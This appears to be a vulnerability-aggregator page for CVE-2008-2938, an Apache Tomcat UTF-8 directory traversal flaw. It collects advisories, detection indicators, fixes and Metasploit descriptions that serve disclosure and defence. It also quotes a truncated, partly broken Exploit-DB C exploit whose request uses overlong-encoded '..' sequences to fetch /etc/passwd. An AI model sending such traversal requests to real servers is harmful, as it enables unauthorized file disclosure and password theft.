CVE-2008-2938
published 2008-08-13CVE-2008-2938: Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are…
PriorityP350medium4.3CVSS 2.0
AVNACMAuNCPINAN
EXPLOIT
EPSS
99.71%
100.0th percentile
Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | tomcat | 4.0.0 – 4.1.37 | — |
| apache | tomcat | 5.0.0 – 5.5.26 | — |
| apache | tomcat | 6.0.0 – 6.0.16 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%c0%ae%c0%ae (UTF-8 overlong encoding of '..')
- →Detect HTTP requests containing the UTF-8 overlong-encoded directory traversal sequence %c0%ae%c0%ae (or %C0%AE%C0%AE) in the URI path, which represents an encoded '..' used to escape the web root. ↗
- →Alert on HTTP GET requests where the URI contains repeated occurrences of %c0%ae or %C0%AE (case-insensitive), especially targeting sensitive paths such as /etc/passwd or /WEB-INF/. ↗
- →The vulnerability is only exploitable when both 'allowLinking' is set to true AND 'URIEncoding' is set to UTF-8 in the Tomcat connector configuration. Audit server.xml and context.xml for these settings. ↗
- →The underlying flaw is in the JVM, not Tomcat itself. Vulnerable Java versions include Sun JRE prior to 1.4.2_19, 1.5.0_17, 6u11, and IBM Java prior to 5.0 SR9, 1.4.2 SR13, SE 6 SR4. Correlate Tomcat version with JVM version during triage. ↗
- →In Trend Micro DLP appliance deployments, the same %c0%ae traversal pattern applies; password hashes are stored in /etc/passwd (not /etc/shadow) and are anonymously accessible if vulnerable. ↗
- ·The vulnerability is only triggered under a non-default configuration: both 'allowLinking' and 'URIEncoding=UTF-8' must be explicitly enabled in the Tomcat connector (server.xml or context.xml). ↗
- ·Hot fix (without upgrading): disable allowLinking OR do not set URIEncoding to UTF-8. Either condition alone prevents exploitation. ↗
- ·Affected version range per vendor advisory is Tomcat 4.1.0–4.1.37, 5.5.0–5.5.26, and 6.0.0–6.0.16; reports of 6.0.17 being affected are incorrect per the vendor. ↗
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:P/I:N/A:N
ghsa5.0MEDIUM
osv5.0MEDIUM
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
tomcat Unicode directory traversal vulnerability
vendor_redhat·2008-08-11·CVSS 5.0
CVE-2008-2938 [MEDIUM] tomcat Unicode directory traversal vulnerability
tomcat Unicode directory traversal vulnerability
Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
OSV
Apache Tomcat Directory Traversal vulnerability
osv·2022-05-01·CVSS 5.0
CVE-2008-2938 [MEDIUM] Apache Tomcat Directory Traversal vulnerability
Apache Tomcat Directory Traversal vulnerability
Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
GHSA
Apache Tomcat Directory Traversal vulnerability
ghsa·2022-05-01·CVSS 5.0
CVE-2008-2938 [MEDIUM] CWE-22 Apache Tomcat Directory Traversal vulnerability
Apache Tomcat Directory Traversal vulnerability
Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
No detection rules found.
Exploit-DB
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal
exploitdb·2010-07-28
CVE-2008-2938 Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal
Apache Tomcat
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define EXPLOIT "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.0\n\n"
#define RCVBUFSIZE 9999
#define tester "root:x"
void cls()
{
char esc = 27;
printf("%c%s",esc,"[2J");
printf("%c%s",esc,"[1;1H");
}
int main(int argc,char **argv)
{
if(argch_addr);
memset(&(their_addr.sin_zero), '\0', 8);
if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
perror("failed to connect !!!");
}
else
{
printf("\n[+]Port 80 opens !!! now sending your exploit to our target\n");
if(send(sockfd, EXPLOIT,999,0)==-1)
{
perror ("send");
}
else
{
totalbytes=0;
while (totalbytes < RCVBUFSIZE)
{
if ((bytesrcv = recv(sockfd, echobuf, RCVBUFSIZE - 1, 0)) <= 0)
{
}
els
Exploit-DB
toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities
exploitdb·2009-11-07
CVE-2009-4849 toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities
toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities
---
&redirectSecure Network - Security Research Advisory
Vuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities
Systems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882
Systems not affected: --
Severity: High
Local/Remote: Remote
Vendor URL: http://www.toutvirtual.com
Author(s): Alberto Trivero (a.trivero (at) securenetwork (dot) it [email concealed])
Claudio Criscione (c.criscione (at) securenetwork (dot) it [email concealed])
Vendor disclosure: 02/07/2009
Vendor acknowledged: 16/07/2009
Vendor patch release: notified us on 06/11/2009
Public disclosure: 07/11/2009
Advisory number: SN-2009-02
Advisory URL: http://www.securenetwork.it/advisories/sn-2009-02.txt
*** SUMMARY ***
ToutVirtual's VirtualIQ Pro is speci
Exploit-DB
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)
exploitdb·2008-08-11·CVSS 4.3
CVE-2008-2938 [MEDIUM] Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)
---
Title: Apache Tomcat Directory Traversal Vulnerability
Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)
Severity: High
Impact: Remote File Disclosure
Vulnerable Version: prior to 6.0.18
Solution:
- Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org)
- Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability.
- Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next releases. Please apply the hot fix until next release.
References:
- http://tomcat.apache.org/security.html
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
History:
- 07.17.2008: Initiate notify (To Apache Security Team)
- 08.02.2008: Responsed this problem fixed and released
Metasploit
Tomcat UTF-8 Directory Traversal Vulnerability
metasploit
Tomcat UTF-8 Directory Traversal Vulnerability
Tomcat UTF-8 Directory Traversal Vulnerability
This module tests whether a directory traversal vulnerability is present in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0 - 6.0.16 under specific and non-default installations. The connector must have allowLinking set to true and URIEncoding set to UTF-8. Furthermore, the vulnerability actually occurs within Java and not Tomcat; the server must use Java versions prior to Sun 1.4.2_19, 1.5.0_17, 6u11 - or prior IBM Java 5.0 SR9, 1.4.2 SR13, SE 6 SR4 releases. This module has only been tested against RedHat 9 running Tomcat 6.0.16 and Sun JRE 1.5.0-05. You may wish to change FILE (hosts,sensitive files), MAXDIRS and RPORT depending on your environment.
Metasploit
TrendMicro Data Loss Prevention 5.5 Directory Traversal
metasploit
TrendMicro Data Loss Prevention 5.5 Directory Traversal
TrendMicro Data Loss Prevention 5.5 Directory Traversal
This module tests whether a directory traversal vulnerability is present in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294. The vulnerability appears to be actually caused by the Tomcat UTF-8 bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938. This module simply tests for the same bug with Trend Micro specific settings. Note that in the Trend Micro appliance, /etc/shadow is not used and therefore password hashes are stored and anonymously accessible in the passwd file.
arXiv
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
arxiv_fulltext·2019-05-29
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
: Leveraging Temporal Word Embeddings to
Understand the Evolution of Cyberattacks
## Abstract
Despite the fact that cyberattacks are constantly growing in complexity, the research community still lacks effective tools to easily monitor and understand them.
In particular, there is a need for techniques that are able to not only track how prominently certain malicious actions, such as the exploitation of specific vulnerabilities, are exploited in the wild, but also (and more importantly) how these malicious actions factor in as attack steps in more complex cyberattacks.
In this paper we present , a system that uses temporal word embeddings to model how attack steps are exploited in the wild, and track how they evolve.
We test on a dataset of billions of security events collected from the c
Bugzilla
CVE-2008-2938 tomcat Unicode directory traversal vulnerability
bugzilla·2008-07-21·CVSS 4.3
CVE-2008-2938 [MEDIUM] CVE-2008-2938 tomcat Unicode directory traversal vulnerability
CVE-2008-2938 tomcat Unicode directory traversal vulnerability
Tomcat allows remote attackers to access local resources via directory
traversal, iff the following two modifications have been applied
- URIEncoding in server.xml (tag Connector) is set to "UTF-8"
- allowLinking in context.xml (tag Context) is set to "true"
Discussion:
tomcat6-6.0.18-1.1.fc9 has been submitted as an update for Fedora 9.
http://admin.fedoraproject.org/updates/tomcat6-6.0.18-1.1.fc9
---
tomcat6-6.0.18-1.1.fc9 has been pushed to the Fedora 9 stable repository. If problems still persist, please make note of it in this bug report.
---
tomcat5-5.5.27-0jpp.1.fc8 has been submitted as an update for Fedora 8.
http://admin.fedoraproject.org/updates/tomcat5-5.5.27-0jpp.1.fc8
---
tomcat5-5.5.27-0jpp.2.fc9 has bee
http://lists.apple.com/archives/security-announce/2008/Oct/msg00001.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-09/msg00004.htmlhttp://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.htmlhttp://marc.info/?l=bugtraq&m=123376588623823&w=2http://secunia.com/advisories/31639http://secunia.com/advisories/31865http://secunia.com/advisories/31891http://secunia.com/advisories/31982http://secunia.com/advisories/32120http://secunia.com/advisories/32222http://secunia.com/advisories/32266http://secunia.com/advisories/33797http://secunia.com/advisories/37297http://securityreason.com/securityalert/4148http://support.apple.com/kb/HT3216http://support.avaya.com/elmodocs2/security/ASA-2008-401.htmhttp://tomcat.apache.org/security-4.htmlhttp://tomcat.apache.org/security-5.htmlhttp://tomcat.apache.org/security-6.htmlhttp://www.kb.cert.org/vuls/id/343355http://www.mandriva.com/security/advisories?name=MDVSA-2008:188http://www.redhat.com/support/errata/RHSA-2008-0648.htmlhttp://www.redhat.com/support/errata/RHSA-2008-0862.htmlhttp://www.redhat.com/support/errata/RHSA-2008-0864.htmlhttp://www.securenetwork.it/ricerca/advisory/download/SN-2009-02.txthttp://www.securityfocus.com/archive/1/495318/100/0/threadedhttp://www.securityfocus.com/archive/1/507729/100/0/threadedhttp://www.securityfocus.com/bid/30633http://www.securityfocus.com/bid/31681http://www.securitytracker.com/id?1020665http://www.vupen.com/english/advisories/2008/2343http://www.vupen.com/english/advisories/2008/2780http://www.vupen.com/english/advisories/2008/2823http://www.vupen.com/english/advisories/2009/0320https://exchange.xforce.ibmcloud.com/vulnerabilities/44411https://lists.apache.org/thread.html/29dc6c2b625789e70a9c4756b5a327e6547273ff8bde7e0327af48c5%40%3Cdev.tomcat.apache.org%3Ehttps://lists.apache.org/thread.html/c62b0e3a7bf23342352a5810c640a94b6db69957c5c19db507004d74%40%3Cdev.tomcat.apache.org%3Ehttps://lists.apache.org/thread.html/rb71997f506c6cc8b530dd845c084995a9878098846c7b4eacfae8db3%40%3Cdev.tomcat.apache.org%3Ehttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10587https://www.exploit-db.com/exploits/6229https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00712.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-September/msg00859.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-September/msg00889.htmlhttp://lists.apple.com/archives/security-announce/2008/Oct/msg00001.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-09/msg00004.htmlhttp://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.htmlhttp://marc.info/?l=bugtraq&m=123376588623823&w=2http://secunia.com/advisories/31639http://secunia.com/advisories/31865http://secunia.com/advisories/31891http://secunia.com/advisories/31982http://secunia.com/advisories/32120http://secunia.com/advisories/32222http://secunia.com/advisories/32266http://secunia.com/advisories/33797http://secunia.com/advisories/37297http://securityreason.com/securityalert/4148http://support.apple.com/kb/HT3216http://support.avaya.com/elmodocs2/security/ASA-2008-401.htmhttp://tomcat.apache.org/security-4.htmlhttp://tomcat.apache.org/security-5.htmlhttp://tomcat.apache.org/security-6.htmlhttp://www.kb.cert.org/vuls/id/343355http://www.mandriva.com/security/advisories?name=MDVSA-2008:188http://www.redhat.com/support/errata/RHSA-2008-0648.htmlhttp://www.redhat.com/support/errata/RHSA-2008-0862.htmlhttp://www.redhat.com/support/errata/RHSA-2008-0864.htmlhttp://www.securenetwork.it/ricerca/advisory/download/SN-2009-02.txthttp://www.securityfocus.com/archive/1/495318/100/0/threadedhttp://www.securityfocus.com/archive/1/507729/100/0/threadedhttp://www.securityfocus.com/bid/30633http://www.securityfocus.com/bid/31681http://www.securitytracker.com/id?1020665http://www.vupen.com/english/advisories/2008/2343http://www.vupen.com/english/advisories/2008/2780http://www.vupen.com/english/advisories/2008/2823http://www.vupen.com/english/advisories/2009/0320https://exchange.xforce.ibmcloud.com/vulnerabilities/44411https://lists.apache.org/thread.html/29dc6c2b625789e70a9c4756b5a327e6547273ff8bde7e0327af48c5%40%3Cdev.tomcat.apache.org%3Ehttps://lists.apache.org/thread.html/c62b0e3a7bf23342352a5810c640a94b6db69957c5c19db507004d74%40%3Cdev.tomcat.apache.org%3Ehttps://lists.apache.org/thread.html/rb71997f506c6cc8b530dd845c084995a9878098846c7b4eacfae8db3%40%3Cdev.tomcat.apache.org%3Ehttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10587https://www.exploit-db.com/exploits/6229https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00712.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-September/msg00859.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-September/msg00889.html
2008-08-13
Published